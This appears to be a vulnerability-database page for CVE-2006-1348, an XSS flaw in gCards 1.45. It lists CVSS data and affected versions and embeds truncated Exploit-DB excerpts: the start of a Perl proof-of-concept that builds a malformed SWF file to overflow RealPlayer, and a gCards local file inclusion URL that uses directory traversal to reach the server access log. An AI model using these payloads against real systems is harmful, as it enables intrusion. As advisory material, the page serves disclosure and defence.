CVE-2006-1348
published 2006-03-22CVE-2006-1348: Cross-site scripting (XSS) vulnerability in index.php in Greg Neustaetter gCards 1.45 and earlier allows remote attackers to inject arbitrary web script or…
PriorityP417medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EXPLOIT
EPSS
1.93%
77.5th percentile
Cross-site scripting (XSS) vulnerability in index.php in Greg Neustaetter gCards 1.45 and earlier allows remote attackers to inject arbitrary web script or HTML via the lang[*][file] parameter, which is injected into an error message. NOTE: this issue might be resultant from CVE-2006-1346.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| greg_neustaetter | gcards | <= 1.45 | — |
| greg_neustaetter | gcards | — | — |
| greg_neustaetter | gcards | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
RealPlayer 10.5 (6.0.12.1040-1348) - SWF Buffer Overflow (PoC)
exploitdb·2006-03-28·CVSS 9.3
CVE-2006-0323 [CRITICAL] RealPlayer 10.5 (6.0.12.1040-1348) - SWF Buffer Overflow (PoC)
RealPlayer 10.5 (6.0.12.1040-1348) - SWF Buffer Overflow (PoC)
---
#!/usr/bin/perl
###################################################
# RealPlayer: Buffer overflow vulnerability / PoC
#
# CVE-2006-0323
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0323
#
# RealNetworks Advisory
# http://service.real.com/realplayer/security/03162006_player/en/
#
# Federico L. Bossi Bonin
# fbossi[at]netcomm.com.ar
###################################################
# Program received signal SIGSEGV, Segmentation fault.
# [Switching to Thread -1218976064 (LWP 21932)]
# 0xb502eeaf in CanUnload2 () from ./plugins/swfformat.so
my $EGGFILE="egg.swf";
my $header="\x46\x57\x53\x05\xCF\x00\x00\x00\x60";
my $endheader="\x19\xe4\x7d\x1c\xaf\xa3\x92\x0c\x72\xc1\x80\x00\xa2\x08\x01".
"\x00\x00\x00\x00\
Exploit-DB
gCards 1.45 - Multiple Vulnerabilities
exploitdb·2006-03-20
CVE-2006-1348 gCards 1.45 - Multiple Vulnerabilities
gCards 1.45 - Multiple Vulnerabilities
---
#!/usr/bin/php -q -d short_open_tag=on
languageredirect == $_SERVER['PHP_SELF']) {
if (isset($_GET['setLang'])) $_SESSION['setLang'] = $_GET['setLang'];
}
$langFile = $page->relpath.'inc/lang/'.$lang[$_SESSION['setLang']]['file'];
if (file_exists($langFile)) {
include_once($langFile);
}
else {
echo "Could not find language file $langFile";
}
?>
this code is included by main script, so ... arbitrary local inclusion, poc:
http://[target]/[path]/index.php?setLang=suntzu&lang[suntzu][file]=../../../../../../../../../../../var/log/httpd/access_log
this works regardless of any magic_quotes_gpc settings, apart open_basedir
restrictions obviously
ii) also we have SQL injection in admin authentication procedure, admin/loginfunction.php
at lines 28-
No writeups or analysis indexed.
http://attrition.org/pipermail/vim/2006-April/000698.htmlhttp://secunia.com/advisories/19322http://www.osvdb.org/24018http://www.securityfocus.com/bid/17165http://www.vupen.com/english/advisories/2006/1015https://exchange.xforce.ibmcloud.com/vulnerabilities/25343https://www.exploit-db.com/exploits/1595http://attrition.org/pipermail/vim/2006-April/000698.htmlhttp://secunia.com/advisories/19322http://www.osvdb.org/24018http://www.securityfocus.com/bid/17165http://www.vupen.com/english/advisories/2006/1015https://exchange.xforce.ibmcloud.com/vulnerabilities/25343https://www.exploit-db.com/exploits/1595
2006-03-22
Published